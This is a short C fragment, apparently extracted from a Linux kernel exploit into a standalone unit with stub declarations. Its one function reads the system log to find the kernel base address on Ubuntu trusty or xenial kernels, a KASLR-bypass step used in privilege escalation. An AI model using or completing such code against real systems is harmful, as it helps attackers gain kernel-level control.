
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;




typedef struct TYPE_2__ TYPE_1__ ;


struct TYPE_2__ {int kernel_version; } ;


 int dprintf (char*) ;
 unsigned long get_kernel_addr_trusty (char*,int) ;
 unsigned long get_kernel_addr_xenial (char*,int) ;
 size_t kernel ;
 TYPE_1__* kernels ;
 int mmap_syslog (char**,int*) ;
 int * strstr (int ,char*) ;

unsigned long get_kernel_addr_syslog() {
    unsigned long addr = 0;
    char* syslog;
    int size;

    dprintf("[.] trying syslog...\n");

    if (!mmap_syslog(&syslog, &size))
        return 0;

    if (strstr(kernels[kernel].kernel_version, "14.04.1") != ((void*)0))
        addr = get_kernel_addr_trusty(syslog, size);
    else
        addr = get_kernel_addr_xenial(syslog, size);

    if (!addr)
        dprintf("[-] kernel base not found in syslog\n");

    return addr;
}
